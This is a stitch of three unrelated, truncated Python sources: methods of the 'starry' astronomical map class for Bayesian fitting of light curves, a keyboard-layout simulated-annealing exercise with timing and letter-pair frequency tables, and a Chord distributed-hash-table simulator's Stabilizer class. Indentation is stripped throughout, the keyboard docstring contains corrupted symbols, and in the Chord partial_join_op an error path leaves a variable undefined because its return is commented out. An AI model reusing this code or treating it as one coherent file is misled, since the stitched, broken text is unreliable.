kwargs.pop("ys", None)
kwargs.pop("zs", None)
self._check_kwargs("show", kwargs)
def limbdark_is_physical(self):
"""Check whether the limb darkening profile (if any) is physical.
This method uses Sturm's theorem to ensure that the limb darkening
intensity is positive everywhere and decreases monotonically toward
the limb.
Returns:
bool: Whether or not the limb darkening profile is physical.
"""
result = self.ops.limbdark_is_physical(self.u)
if self.lazy:
return result
else:
return bool(result)
def set_data(self, flux, C=None, cho_C=None):
"""Set the data vector and covariance matrix.
This method is required by the :py:meth:`solve` method, which
analytically computes the posterior over surface maps given a
dataset and a prior, provided both are described as multivariate
Gaussians.
Args:
flux (vector): The observed light curve.
C (scalar, vector, or matrix): The data covariance. This may be
a scalar, in which case the noise is assumed to be
homoscedastic, a vector, in which case the covariance
is assumed to be diagonal, or a matrix specifying the full
covariance of the dataset. Default is None. Either `C` or
`cho_C` must be provided.
cho_C (matrix): The lower Cholesky factorization of the data
covariance matrix. Defaults to None. Either `C` or
`cho_C` must be provided.
"""
self._flux = self._math.cast(flux)
self._C = self._linalg.Covariance(C, cho_C, N=self._flux.shape[0])
def set_prior(self, *, mu=None, L=None, cho_L=None):
"""Set the prior mean and covariance of the spherical harmonic coefficients.
This method is required by the :py:meth:`solve` method, which
analytically computes the posterior over surface maps given a
dataset and a prior, provided both are described as multivariate
Gaussians.
Note that the prior is placed on the **amplitude-weighted** coefficients,
i.e., the quantity ``x = map.amp * map.y``. Because the first spherical
harmonic coefficient is fixed at unity, ``x[0]`` is
the amplitude of the map. The actual spherical harmonic coefficients
are given by ``x / map.amp``.
This convention allows one to linearly fit for an arbitrary map normalization
at the same time as the spherical harmonic coefficients, while ensuring
the ``starry`` requirement that the coefficient of the :math:`Y_{0,0}`
harmonic is always unity.
Args:
mu (scalar or vector): The prior mean on the amplitude-weighted
spherical harmonic coefficients. Default is `1.0` for the
first term and zero for the remaining terms. If this is a vector,
it must have length equal to :py:attr:`Ny`.
L (scalar, vector, or matrix): The prior covariance. This may be
a scalar, in which case the covariance is assumed to be
homoscedastic, a vector, in which case the covariance
is assumed to be diagonal, or a matrix specifying the full
prior covariance. Default is None. Either `L` or
`cho_L` must be provided.
cho_L (matrix): The lower Cholesky factorization of the prior
covariance matrix. Defaults to None. Either `L` or
`cho_L` must be provided.
"""
if mu is None:
mu = np.zeros(self.Ny)
mu[0] = 1.0
mu = self._math.cast(mu)
self._mu = self._math.cast(mu) * self._math.cast(np.ones(self.Ny))
self._L = self._linalg.Covariance(L, cho_L, N=self.Ny)
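    # Illustrative sketch of the amplitude-weighted convention documented in
    # `set_prior` (map construction shown schematically):
    #
    #   map = starry.Map(ydeg=2)
    #   map.amp = 2.0
    #   x = map.amp * map.y      # amplitude-weighted coefficient vector
    #   x[0]                     # equals map.amp, since y[0] is fixed at unity
    #   x / map.amp              # recovers the spherical harmonic coefficients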
def remove_prior(self):
"""Remove the prior on the map coefficients."""
self._mu = None
self._L = None
def solve(self, *, design_matrix=None, **kwargs):
"""Solve the linear least-squares problem for the posterior over maps.
This method solves the generalized least squares problem given a
light curve and its covariance (set via the :py:meth:`set_data` method)
and a Gaussian prior on the spherical harmonic coefficients
(set via the :py:meth:`set_prior` method). The map amplitude and
coefficients are set to the maximum a posteriori (MAP) solution.
Args:
design_matrix (matrix, optional): The flux design matrix, the
quantity returned by :py:meth:`design_matrix`. Default is
None, in which case this is computed based on ``kwargs``.
kwargs (optional): Keyword arguments to be passed directly to
:py:meth:`design_matrix`, if a design matrix is not provided.
Returns:
A tuple containing the posterior mean for the amplitude-weighted \
spherical harmonic coefficients (a vector) and the Cholesky factorization \
of the posterior covariance (a lower triangular matrix).
.. note::
Users may call :py:meth:`draw` to draw from the
posterior after calling this method.
"""
# Not implemented for spectral
self._no_spectral()
if self._flux is None or self._C is None:
raise ValueError("Please provide a dataset with `set_data()`.")
elif self._mu is None or self._L is None:
raise ValueError("Please provide a prior with `set_prior()`.")
# Get the design matrix & remove any amplitude weighting
if design_matrix is None:
design_matrix = self.design_matrix(**kwargs)
X = self._math.cast(design_matrix)
# Compute the MAP solution
self._solution = self._linalg.solve(
X, self._flux, self._C.cholesky, self._mu, self._L.inverse
)
# Set the amplitude and coefficients
x, _ = self._solution
self.amp = x[0]
if self.ydeg > 0:
self[1:, :] = x[1:] / self.amp
# Return the mean and covariance
return self._solution
def lnlike(self, *, design_matrix=None, woodbury=True, **kwargs):
"""Returns the log marginal likelihood of the data given a design matrix.
This method computes the marginal likelihood (marginalized over the
spherical harmonic coefficients) given a
light curve and its covariance (set via the :py:meth:`set_data` method)
and a Gaussian prior on the spherical harmonic coefficients
(set via the :py:meth:`set_prior` method).
Args:
design_matrix (matrix, optional): The flux design matrix, the
quantity returned by :py:meth:`design_matrix`. Default is
None, in which case this is computed based on ``kwargs``.
woodbury (bool, optional): Solve the linear problem using the
Woodbury identity? Default is True. The
`Woodbury identity <https://en.wikipedia.org/wiki/Woodbury_matrix_identity>`_
is used to speed up matrix operations in the case that the
number of data points is much larger than the number of
spherical harmonic coefficients. In this limit, it can
speed up the code by more than an order of magnitude. Keep
in mind that the numerical stability of the Woodbury identity
is not great, so if you're getting strange results try
disabling this. It's also a good idea to disable this in the
limit of few data points and large spherical harmonic degree.
kwargs (optional): Keyword arguments to be passed directly to
:py:meth:`design_matrix`, if a design matrix is not provided.
Returns:
The log marginal likelihood, a scalar.
"""
# Not implemented for spectral
self._no_spectral()
if self._flux is None or self._C is None:
raise ValueError("Please provide a dataset with `set_data()`.")
elif self._mu is None or self._L is None:
raise ValueError("Please provide a prior with `set_prior()`.")
# Get the design matrix & remove any amplitude weighting
if design_matrix is None:
design_matrix = self.design_matrix(**kwargs)
X = self._math.cast(design_matrix)
# Compute the likelihood
if woodbury:
return self._linalg.lnlike_woodbury(
X,
self._flux,
self._C.inverse,
self._mu,
self._L.inverse,
self._C.lndet,
self._L.lndet,
)
else:
return self._linalg.lnlike(
X, self._flux, self._C.value, self._mu, self._L.value
)
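# Note (added for clarity): the Woodbury identity referenced in the docstring is
#     (A + U C V)^{-1} = A^{-1} - A^{-1} U (C^{-1} + V A^{-1} U)^{-1} V A^{-1},
# which trades the inversion of the N x N data covariance for an Ny x Ny
# inversion, hence the speed-up when the number of data points N greatly exceeds
# the number of coefficients Ny. The exact factorization used by
# `lnlike_woodbury` lives in the linalg backend and is not reproduced here.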
@property
def solution(self):
r"""The posterior probability distribution for the map.
This is a tuple containing the mean and lower Cholesky factorization of the
covariance of the amplitude-weighted spherical harmonic coefficient vector,
obtained by solving the regularized least-squares problem
via the :py:meth:`solve` method.
Note that to obtain the actual covariance matrix from the lower Cholesky
factorization :math:`L`, simply compute :math:`L L^\top`.
Note also that this is the posterior for the **amplitude-weighted**
map vector. Under this convention, the map amplitude is equal to the
first term of the vector and the spherical harmonic coefficients are
equal to the vector normalized by the first term.
"""
if self._solution is None:
raise ValueError("Please call `solve()` first.")
return self._solution
def draw(self):
"""Draw a map from the posterior distribution.
This method draws a random map from the posterior distribution and
sets the :py:attr:`y` map vector and :py:attr:`amp` map amplitude
accordingly. Users should call :py:meth:`solve` to enable this
attribute.
"""
if self._solution is None:
raise ValueError("Please call `solve()` first.")
# Fast multivariate sampling using the Cholesky factorization
yhat, cho_ycov = self._solution
u = self._math.cast(np.random.randn(self.Ny))
x = yhat + self._math.dot(cho_ycov, u)
self.amp = x[0]
self[1:, :] = x[1:] / self.amp
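# Example usage (a minimal illustrative sketch, not taken from the original
# source; `flux`, `sigma`, and `theta` are assumed/hypothetical names, and the
# exact constructor signature of the map class may differ):
#
#     map = starry.Map(ydeg=2)
#     map.set_data(flux, C=sigma ** 2)   # light curve + homoscedastic covariance
#     map.set_prior(L=1e-2)              # isotropic prior on the coefficients
#     map.solve(theta=theta)             # MAP solution; kwargs go to design_matrix()
#     map.draw()                         # sample a map from the posterior
#
# This only illustrates the set_data -> set_prior -> solve -> draw workflow
# described in the docstrings above.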
class YlmBase(legacy.YlmBase):
"""The default ``starry`` map class.
This class handles light curves and phase curves of objects | |
import random
import pylab
from gurobipy import *
"""
Optimal Keyboard Layout
A standard English keyboard has three rows, with 10, 9 and 7 keys on each. We will label these keys 0, ..., 25, with
keys 0,...,9 on the first row, 10,...,18 on the second row, and 19,...,25 on the third row.
Suppose we know the average time, 𝑡"# , to press key 𝑗 immediately after pressing key 𝑖. For example, if 𝑡&,( = 66
then it takes 66 time units to press the second key (‘W’ on a regular keyboard) after pressing the first key
(‘Q’ on a regular keyboard).
Furthermore, suppose we have data, 𝑓(a, b) , which gives the frequency of each pair of letters (a, b),-
ab in 100,000 pairs of letters in a corpus of text. For example, 𝑓(c, e) = 643 indicates that the ./
pair ‘CE’ occurred 643 times. Thus, if we had assigned ‘C’ to the first key of the keyboard and ‘E’ to the second key,
it would take 643 × 66 = 42438 time units to type the 643 ‘CE’ pairs. From this, the total time taken to type the
100,000 pairs would be
T = sum of t(i, j) 𝑓 p(i) p(j) from i, j = 0 to 25
where 𝑝(𝑘) is the letter assigned to key 𝑘.
A Python stub on Blackboard gives values for 𝑡(i, j) and 𝑓 (a, b)
, along with the function for calculating the total cost for a particular permutation 𝑝(𝑘).
Use simulated annealing to determine an optimal layout for the 26 English letters on the keyboard.
(For comparison, the regular QWERTY keyboard has a total cost of 5,863,759 time units from this data.)
"""
# Time[i][j] gives the time to press key j after pressing key i
Time = [[53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 73, 53, 53, 53, 66, 53, 53, 53, 53, 85, 73, 73, 73, 73, 53, 53],
[66, 53, 66, 66, 66, 53, 53, 53, 53, 53, 53, 73, 53, 53, 66, 53, 53, 53, 53, 73, 85, 73, 73, 73, 53, 53],
[66, 66, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 73, 53, 66, 53, 53, 53, 53, 73, 73, 85, 73, 73, 53, 53],
[66, 66, 66, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 73, 73, 73, 85, 85, 53, 53],
[66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 53, 73, 53, 53, 53, 53, 73, 73, 73, 85, 85, 53, 53],
[53, 53, 53, 53, 53, 53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 53, 53, 53, 85, 85],
[53, 53, 53, 53, 53, 66, 53, 66, 66, 66, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 53, 53, 53, 85, 85],
[53, 53, 53, 53, 53, 66, 66, 53, 66, 66, 53, 53, 53, 53, 53, 66, 53, 73, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 53, 66, 53, 53, 53, 53, 53, 66, 53, 53, 73, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[85, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 66, 53, 53, 53, 53, 53, 73, 73, 73, 73, 53, 53],
[66, 85, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 66, 53, 53, 53, 53, 73, 53, 73, 73, 73, 53, 53],
[66, 66, 85, 66, 66, 53, 53, 53, 53, 53, 53, 53, 66, 53, 66, 53, 53, 53, 53, 73, 73, 53, 73, 73, 53, 53],
[66, 66, 66, 85, 85, 53, 53, 53, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 73, 73, 73, 53, 66, 53, 53],
[66, 66, 66, 85, 85, 53, 53, 53, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 73, 73, 73, 66, 53, 53, 53],
[53, 53, 53, 53, 53, 85, 85, 66, 66, 66, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 66],
[53, 53, 53, 53, 53, 85, 85, 66, 66, 66, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 66, 53]]
# Freq[a][b] gives the frequency that the pair of letters ab occurs in 100,000 pairs from a sample of English
Freq = [[4, 224, 348, 391, 18, 92, 240, 18, 453, 9, 138, 1035, 314, 1767, 10, 191, 0, 1058, 897, 1362, 143, 241, 80, 11,
299, 10],
[161, 20, 11, 0, 599, 0, 0, 0, 87, 10, 0, 226, 2, 0, 248, 0, 0, 161, 41, 9, 237, 9, 0, 0, 194, 0],
[426, 4, 79, 4, 643, 3, 0, 565, 261, 2, 127, 164, 1, 0, 901, 0, 1, 156, 12, 375, 106, 0, 0, 1, 45, 0],
[222, 2, 7, 61, 758, 4, 23, 2, 380, 3, 0, 42, 22, 10, 195, 1, 0, 88, 74, 4, 137, 24, 11, 0, 38, 0],
[717, 32, 542, 1148, 410, 194, 119, 26, 166, 11, 28, 506, 373, 1388, 62, 180, 34, 2123, 1306, 367, 36, 253, 140,
194, 147, 3],
[154, 0, 0, 0, 203, 185, 0, 1, 331, 3, 0, 63, 1, 0, 530, 0, 0, 224, 7, 98, 91, 0, 0, 0, 3, 0],
[182, 5, 0, 8, 393, 2, 46, 230, 140, 0, 1, 62, 2, 69, 175, 1, 0, 194, 27, 10, 75, 0, 2, 0, 11, 0],
[1040, 2, 2, 11, 3026, 1, 1, 6, 653, 0, 0, 13, 12, 24, 502, 1, 0, 81, 17, 134, 59, 1, 4, 0, 24, 0],
[263, 85, 678, 348, 341, 133, 233, 8, 7, 1, 48, 532, 266, 2407, 728, 88, 7, 299, 1208, 1109, 13, 256, 1, 22, 5,
40],
[31, 0, 0, 0, 41, 0, 0, 0, 3, 0, 0, 1, 0, 0, 59, 0, 0, 0, 0, 0, 53, 0, 0, 0, 1, 0],
[13, 3, 1, 3, 247, 2, 2, 1, 118, 0, 1, 24, 1, 24, 3, 1, 0, 3, 42, 1, 5, 0, 1, 0, 4, 0],
[587, 6, 15, 325, 876, 46, 26, 2, 615, 2, 16, 657, 21, 6, 321, 18, 0, | |
# chord_sim/modules/stabilizer.py
# coding:utf-8
from typing import Dict, List, Optional, cast, TYPE_CHECKING
import sys
import modules.gval as gval
import traceback
from .chord_util import ChordUtil, KeyValue, NodeIsDownedExceptiopn, AppropriateNodeNotFoundException, \
InternalControlFlowException, DataIdAndValue, ErrorCode, PResult
from .taskqueue import TaskQueue
if TYPE_CHECKING:
from .node_info import NodeInfo
from .chord_node import ChordNode
class Stabilizer:
# If join fails because router.find_successor raised an exception, the node is stored in these class
# variables so that the next join attempt can retry it.
# Note: by design of this simulator, each of these fields only needs to hold a single entry
need_join_retry_node : Optional['ChordNode'] = None
need_join_retry_tyukai_node: Optional['ChordNode'] = None
def __init__(self, existing_node : 'ChordNode'):
self.existing_node : 'ChordNode' = existing_node
# Return a deep copy of this node's successor_info_list
def pass_successor_list(self) -> List['NodeInfo']:
return [ node_info.get_partial_deepcopy() for node_info in self.existing_node.node_info.successor_info_list]
def pass_predecessor_info(self) -> Optional['NodeInfo']:
if self.existing_node.node_info.predecessor_info != None:
return cast('NodeInfo', self.existing_node.node_info.predecessor_info).get_partial_deepcopy()
else:
return None
# Check the length of successor_info_list; if it exceeds the prescribed length, have the surplus
# nodes delete their replicas and then remove them from the list
# TODO: InternalExp at check_successor_list_length
def check_successor_list_length(self) -> PResult[bool]:
if self.existing_node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint("check_successor_list_length_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of succcessor_info_list is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
try:
ChordUtil.dprint(
"check_successor_list_length_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ str(len(self.existing_node.node_info.successor_info_list)))
if len(self.existing_node.node_info.successor_info_list) > gval.SUCCESSOR_LIST_NORMAL_LEN:
list_len = len(self.existing_node.node_info.successor_info_list)
delete_elem_list : List['NodeInfo'] = []
for idx in range(gval.SUCCESSOR_LIST_NORMAL_LEN, list_len):
# If entries were removed from successor_info_list, some indices produced by range may no
# longer have an element, so re-check against the latest length
if idx >= len(self.existing_node.node_info.successor_info_list):
break
ChordUtil.dprint(
"check_successor_list_length_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[idx])
+ str(len(self.existing_node.node_info.successor_info_list)))
delete_elem_list.append(self.existing_node.node_info.successor_info_list[idx])
# Remove the elements the loop above decided to delete
for elem in delete_elem_list:
self.existing_node.node_info.successor_info_list.remove(elem)
return PResult.Ok(True)
finally:
self.existing_node.node_info.lock_of_succ_infos.release()
# Forcibly set the routing table information from another node.
# Inside the join method this is used only by the second node towards the first node; it must not be used in any other case
def set_routing_infos_force(self, predecessor_info : 'NodeInfo', successor_info_0 : 'NodeInfo', ftable_enry_0 : 'NodeInfo'):
with self.existing_node.node_info.lock_of_pred_info, self.existing_node.node_info.lock_of_succ_infos:
self.existing_node.node_info.predecessor_info = predecessor_info
self.existing_node.node_info.successor_info_list[0] = successor_info_0
self.existing_node.node_info.finger_table[0] = ftable_enry_0
# Query the node at node_address and set the node it reports as the successor
def join(self, node_address : str):
with self.existing_node.node_info.lock_of_pred_info, self.existing_node.node_info.lock_of_succ_infos:
# Given the implementation, no exception occurs here.
# A real system is also not expected to be handed the information of a downed node
#tyukai_node = ChordUtil.get_node_by_address(node_address)
tyukai_node = cast('ChordNode', ChordUtil.get_node_by_address(node_address).result)
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# try:
# Ask the intermediary node to find the node that should become our successor
# TODO: find_successor call at join
#successor = tyukai_node.endpoints.grpc__find_successor(self.existing_node.node_info.node_id)
ret = tyukai_node.endpoints.grpc__find_successor(self.existing_node.node_info.node_id)
if (ret.is_ok):
successor : 'ChordNode' = cast('ChordNode', ret.result)
# No retry is needed, so reset the fields that the caller of this method uses to
# decide whether retry processing is required
Stabilizer.need_join_retry_node = None
else: # ret.err_code == ErrorCode.AppropriateNodeNotFoundException_CODE || ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# Record the information needed for a retry
Stabilizer.need_join_retry_node = self.existing_node
Stabilizer.need_join_retry_tyukai_node = tyukai_node
# Own node info, intermediary node info
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint(
"join_2,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
return
# except (AppropriateNodeNotFoundException, NodeIsDownedExceptiopn, InternalControlFlowException):
# # Record the information needed for a retry
# Stabilizer.need_join_retry_node = self.existing_node
# Stabilizer.need_join_retry_tyukai_node = tyukai_node
#
# # Own node info, intermediary node info
# # TODO: x direct access to node_info of tyukai_node at join
# ChordUtil.dprint("join_2,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# return
# try:
# TODO: x direct access to node_info of successor at join
self.existing_node.node_info.successor_info_list.append(successor.node_info.get_partial_deepcopy())
# Index 0 of finger_table must always be the successor, so set it here
self.existing_node.node_info.finger_table[0] = self.existing_node.node_info.successor_info_list[0].get_partial_deepcopy()
# TODO: x direct access to node_info of tyukai_node at join
if tyukai_node.node_info.node_id == tyukai_node.node_info.successor_info_list[0].node_id:
# Handling for the second-node case (the intermediary node is always the first node)
predecessor = tyukai_node
# With just two nodes, forcibly set everything so that the successor and predecessor links form a correct ring
# TODO: x direct access to node_info of predecessor at join
self.existing_node.node_info.predecessor_info = predecessor.node_info.get_partial_deepcopy()
tyukai_node.endpoints.grpc__set_routing_infos_force(
self.existing_node.node_info.get_partial_deepcopy(),
self.existing_node.node_info.get_partial_deepcopy(),
self.existing_node.node_info.get_partial_deepcopy()
)
# tyukai_node.node_info.predecessor_info = self.existing_node.node_info.get_partial_deepcopy()
# tyukai_node.node_info.successor_info_list[0] = self.existing_node.node_info.get_partial_deepcopy()
# # Forcibly set entry 0 of the finger table as well
# tyukai_node.node_info.finger_table[0] = self.existing_node.node_info.get_partial_deepcopy()
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
else:
# Here only the successor and the successor node's information are made consistent
# TODO: check_predecessor call at join
#successor.endpoints.grpc__check_predecessor(self.existing_node.node_info)
ret2 = successor.endpoints.grpc__check_predecessor(self.existing_node.node_info)
if (ret2.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# Record the information needed for a retry
Stabilizer.need_join_retry_node = self.existing_node
Stabilizer.need_join_retry_tyukai_node = tyukai_node
# In case values have already been set, reset the contents
self.existing_node.node_info.successor_info_list = []
# Own node info, intermediary node info
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_3,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
ChordUtil.dprint(traceback.format_exc())
return PResult.Err(False, cast(int, ret2.err_code))
# Fill in successor_info_list
# TODO: pass_successor_list call at join
succ_list_of_succ: List[NodeInfo] = successor.endpoints.grpc__pass_successor_list()
list_len = len(succ_list_of_succ)
for idx in range(0, gval.SUCCESSOR_LIST_NORMAL_LEN - 1):
if idx < list_len:
self.existing_node.node_info.successor_info_list.append(
succ_list_of_succ[idx].get_partial_deepcopy())
# Receive from the successor the data of the ID range this node becomes responsible for, and store it
# TODO: delegate_my_tantou_data call at join
tantou_data_list: List[KeyValue] = successor.endpoints.grpc__delegate_my_tantou_data(
self.existing_node.node_info.node_id)
with self.existing_node.node_info.lock_of_datastore:
for key_value in tantou_data_list:
self.existing_node.data_store.store_new_data(cast(int, key_value.data_id), key_value.value_data)
# Let the thread in charge of stabilize processing run the remaining replica-related work separately
self.existing_node.tqueue.append_task(TaskQueue.JOIN_PARTIAL)
gval.is_waiting_partial_join_op_exists = True
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # Record the information needed for a retry
# Stabilizer.need_join_retry_node = self.existing_node
# Stabilizer.need_join_retry_tyukai_node = tyukai_node
#
# # In case values have already been set, reset the contents
# self.existing_node.node_info.successor_info_list = []
#
# # Own node info, intermediary node info
# # TODO: x direct access to node_info of tyukai_node at join
# ChordUtil.dprint("join_3,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# ChordUtil.dprint(traceback.format_exc())
# return
# The replica-related portion of the join processing, split out into its own method.
# Executed only once (failures not counted) by the thread that runs the stabilize processing
# TODO: InternalExp at partial_join_op
def partial_join_op(self) -> PResult[bool]:
if self.existing_node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint(
"partial_join_op_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of predecessor_info is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
if self.existing_node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
self.existing_node.node_info.lock_of_pred_info.release()
ChordUtil.dprint(
"partial_join_op_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of succcessor_info_list is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
if self.existing_node.is_alive == False:
# Handle the case where this node was killed in the middle of processing:
# finish without doing anything
self.existing_node.node_info.lock_of_succ_infos.release()
self.existing_node.node_info.lock_of_pred_info.release()
ChordUtil.dprint("partial_join_op_2_5," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "REQUEST_RECEIVED_BUT_I_AM_ALREADY_DEAD")
return PResult.Ok(True)
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
try:
# Distribute the data delegated by successor[0] to every node in the successor list as replicas
tantou_data_list : List[DataIdAndValue] = self.existing_node.data_store.get_all_tantou_data()
for node_info in self.existing_node.node_info.successor_info_list:
# try:
#succ : 'ChordNode' = ChordUtil.get_node_by_address(node_info.address_str)
ret = ChordUtil.get_node_by_address(node_info.address_str)
if (ret.is_ok):
succ: 'ChordNode' = cast('ChordNode', ret.result)
ChordUtil.dprint("partial_join_op_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info) + "," + str(len(self.existing_node.node_info.successor_info_list)))
# TODO: receive_replica call at partial_join_op
succ.endpoints.grpc__receive_replica(
[DataIdAndValue(data_id = data.data_id, value_data=data.value_data) for data in tantou_data_list]
)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# If the node was down or similar, ignore it and move on to the next node.
# Handling node failures and the proper re-placement of the related replicas happen later inside
# the stabilize and put processing respectively, so they are not dealt with here
# (note that the replica may be absent from that node for a non-trivial amount of time)
ChordUtil.dprint("partial_join_op_4,NODE_IS_DOWNED or InternalControlFlowException,"
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
continue
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# # If the node was down or similar, ignore it and move on to the next node.
# # Handling node failures and the proper re-placement of the related replicas happen later inside
# # the stabilize and put processing respectively, so they are not dealt with here
# # (note that the replica may be absent from that node for a non-trivial amount of time)
# ChordUtil.dprint("partial_join_op_4,NODE_IS_DOWNED or InternalControlFlowException,"
# + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# continue
def handle_err():
ChordUtil.dprint(
"partial_join_op_6,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
# If the node was down or similar, ignore it and carry on.
# Handling node failures and the proper re-placement of the related replicas happen later inside
# the stabilize and put processing respectively, so they are not dealt with here
# (note that the replica may be absent from this node for a non-trivial amount of time)
pass
if self.existing_node.node_info.predecessor_info != None:
# If the predecessor is not None, this node has to keep that node's data as replicas,
# so have the predecessor hand the data over and store it
self_predecessor_info : NodeInfo = cast('NodeInfo', self.existing_node.node_info.predecessor_info)
# try:
#self_predeessor_node : 'ChordNode' = ChordUtil.get_node_by_address(self_predecessor_info.address_str)
ret = ChordUtil.get_node_by_address(self_predecessor_info.address_str)
if (ret.is_ok):
self_predeessor_node: 'ChordNode' = cast('ChordNode', ret.result)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
handle_err()
#return PResult.Ok(True)
# TODO: get_all_tantou_data call at partial_join_op
pred_tantou_datas : List[DataIdAndValue] = self_predeessor_node.endpoints.grpc__get_all_tantou_data()
for iv_entry in pred_tantou_datas:
self.existing_node.data_store.store_new_data(iv_entry.data_id,
iv_entry.value_data,
)
ChordUtil.dprint("partial_join_op_5," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self_predeessor_node.node_info) + "," + str(len(pred_tantou_datas)))
# If the predecessor is not None, its successor_info_list may have grown beyond the
# standard length, so check for that
# (that call also removes the surplus nodes' entries from successor_info_list)
# TODO: check_successor_list_length call at partial_join_op
#self_predeessor_node.endpoints.grpc__check_successor_list_length()
ret2 = self_predeessor_node.endpoints.grpc__check_successor_list_length()
if (ret2.is_ok):
pass
